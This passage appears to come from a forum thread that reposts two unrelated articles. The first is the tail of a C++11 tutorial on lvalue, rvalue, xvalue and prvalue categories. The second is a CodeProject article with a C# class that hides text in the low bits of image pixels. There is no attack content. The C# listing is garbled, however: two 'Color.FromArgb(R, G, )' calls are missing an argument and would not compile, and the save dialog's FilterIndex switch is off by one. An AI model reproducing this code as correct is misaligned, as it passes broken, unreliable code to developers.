thereof) were the main criterion for distinguishing between lvalues and rvalues. However, the addition of rvalue references and move semantics to C++11 added a twist to the plot. Binding Rvalues C++11 lets you bind rvalue references to rvalues, effectively prolonging their lifetime as if they were lvalues: //C++11 int && func2(){ return 17; //returns an rvalue } int main() { int x=0; int&& rr=func2(); cout<<rr<<endl;//ouput: 17 x=rr;// x=17 after the assignment } Using lvalue references where rvalue references are required is an error: int& func2(){//compilation error: cannot bind return 17; //an lvalue reference to an rvalue } In C++03 copying the rvalue to an lvalue is the preferred choice (in some cases you can bind an lvalue reference to const to achieve a similar effect): int func2(){ // an rvalue expression return 17; } int m=func2(); // C++03-style copying For fundamental types, the copy approach is reasonable. However, as far as class objects are concerned, spurious copying might incur performance overhead. Instead, C++11 encourages you to move objects. Moving means pilfering the resources of the source object, instead of copying it. For further information about move semantics, read C++11 Tutorial: Introducing the Move Constructor and the Move Assignment Operator. //C++11 move semantics in action string source ("abc"), target; target=std::move(source); //pilfer source //source no longer owns the resource cout<<"source: "<<source<<endl; //source: cout<<"target: "<<target<<endl; //target: abc How does move semantics affect the semantics of lvalues and rvalues? The Semantics of Change In C++03, all you needed to know was whether a value had identity. In C++11 you also have to examine another property: movability. The combination of identity and movability (i and m, respectively, with a minus sign indicating negation) produces five meaningful value categories in C++11— “a whole type-zoo,” as one of my Twitter followers put it: i-m: lvalues are non-movable objects with identity. These are classic C++03 lvalues from the pre-move era. The expression *p, where p is a pointer to an object is an lvalue. Similarly, dereferencing a pointer to a function is an lvalue. im: xvalues (an “eXpiring” value) refers to an object near the end of its lifetime (before its resources are moved, for example). An xvalue is the result of certain kinds of expressions involving rvalue references, e.g., std::move(mystr); i: glvalues, or generalized lvalues, are values with identity. These include lvalues and xvalues. m: rvalues include xvalues, temporaries, and values that have no identity. -im: prvalues, or pure rvalues, are rvalues that are not xvalues. Prvalues include literals and function calls whose return type is not a reference. A detailed discussion about the new value categories is available in section 3.10 of the C++11 standard. It has often been said that the original semantics of C++03 lvalues and rvalues remains unchanged in C++11. However, the C++11 taxonomy isn’t quite the same as that of C++03; In C++11, every expression belongs to exactly one of the value classifications lvalue, xvalue, or prvalue. In Conclusion Fifty years after their inception, lvalues and rvalues are still relevant not only in C++ but in many contemporary programming languages. C++11 changed the semantics of rvalues, introducing xvalues and prvalues. Conceptually, you can tame this type-zoo by grouping the five value categories into supersets, where glvalues include lvalues and xvalues, and rvalues include xvalues and prvalues. Still confused? It’s not you. It’s BCPL’s heritage that exhibits unusual vitality in a world that’s light years away from the punched card and 16 kilobyte RAM era. About the author: Danny Kalev is a certified system analyst and software engineer specializing in C++. Kalev has written several C++ textbooks and contributes C++ content regularly on various software developers’ sites. He was a member of the C++ standards committee and has a master’s degree in general linguistics. He’s now pursuing a PhD in linguistics. Follow him on Twitter. Sursa: C++11 Tutorial: Explaining the Ever-Elusive Lvalues and Rvalues
-
[h=1]Steganography: Simple Implementation in C#[/h]By Hamzeh soboh, 31 Oct 2013 Download source - 154.3 KB [h=2]Introduction[/h] Steganography is the art and science of hiding information by embedding messages within others. Steganography works by replacing bits of useless or unused data in regular computer files with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images [*]. I've implemented two methods that can be helpful to embed/extract a text in/from an image. The first one is embedText that receives the text you want to embed and the Bitmap object of the original image (your image before embedding the text in it), and returns the Bitmap object of the image after embedding the text in it. Then you can export the Bitmap object into an image file. It is optional to encrypt your text before starting the process for extra security. You are free then to send the result image by email or keep it on your flash memory for example. The second method is extractText that receives the Bitmap object of the processed image (the image that has already been used to embed the text in), and returns the text that has been extracted. [h=2]Executing the Code[/h]If you download the attached testing project, it allows you to open an image, write your text or import a text file, optionally encrypt your text before starting processing, embed the text in the image, and finally save the result image into an image file. Then you can reopen that application and the image that you've saved, and extract the text from it. [h=2]Using the Code[/h] The SteganographyHelper class contains the needed methods to embed/extract a text in/from an image. CAUTION: Don't save the result image in a lossy format (like JPEG); your data will be lost. Saving it as PNG is pretty good. class SteganographyHelper { enum State { hiding, filling_with_zeros }; public static Bitmap embedText(string text, Bitmap bmp) { State s = State.hiding; int charIndex = 0; int charValue = 0; long colorUnitIndex = 0; int zeros = 0; int R = 0, G = 0, B = 0; for (int i = 0; i < bmp.Height; i++) { for (int j = 0; j < bmp.Width; j++) { Color pixel = bmp.GetPixel(j, i); pixel = Color.FromArgb(pixel.R - pixel.R % 2, pixel.G - pixel.G % 2, pixel.B - pixel.B % 2); R = pixel.R; G = pixel.G; B = pixel.B; for (int n = 0; n < 3; n++) { if (colorUnitIndex % 8 == 0) { if (zeros == 8) { if ((colorUnitIndex - 1) % 3 < 2) { bmp.SetPixel(j, i, Color.FromArgb(R, G, ); } return bmp; } if (charIndex >= text.Length) { s = State.filling_with_zeros; } else { charValue = text[charIndex++]; } } switch (colorUnitIndex % 3) { case 0: { if (s == State.hiding) { R += charValue % 2; charValue /= 2; } } break; case 1: { if (s == State.hiding) { G += charValue % 2; charValue /= 2; } } break; case 2: { if (s == State.hiding) { B += charValue % 2; charValue /= 2; } bmp.SetPixel(j, i, Color.FromArgb(R, G, ); } break; } colorUnitIndex++; if (s == State.filling_with_zeros) { zeros++; } } } } return bmp; } public static string extractText(Bitmap bmp) { int colorUnitIndex = 0; int charValue = 0; string extractedText = String.Empty; for (int i = 0; i < bmp.Height; i++) { for (int j = 0; j < bmp.Width; j++) { Color pixel = bmp.GetPixel(j, i); for (int n = 0; n < 3; n++) { switch (colorUnitIndex % 3) { case 0: { charValue = charValue * 2 + pixel.R % 2; } break; case 1: { charValue = charValue * 2 + pixel.G % 2; } break; case 2: { charValue = charValue * 2 + pixel.B % 2; } break; } colorUnitIndex++; if (colorUnitIndex % 8 == 0) { charValue = reverseBits(charValue); if (charValue == 0) { return extractedText; } char c = (char)charValue; extractedText += c.ToString(); } } } } return extractedText; } public static int reverseBits(int n) { int result = 0; for (int i = 0; i < 8; i++) { result = result * 2 + n % 2; n /= 2; } return result; } } You can use the following code snippet to save the result image: private void saveImageAs() { SaveFileDialog save_dialog = new SaveFileDialog(); save_dialog.Filter = "PNG|*.png|Bitmap|*.bmp"; if (save_dialog.ShowDialog() == DialogResult.OK) { switch (save_dialog.FilterIndex) { case 0: { bmp.Save(save_dialog.FileName, ImageFormat.Png); }break; case 1: { bmp.Save(save_dialog.FileName, ImageFormat.Bmp); } break; } } } [h=2]License[/h] This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) Sursa: Steganography: Simple Implementation in C# - CodeProject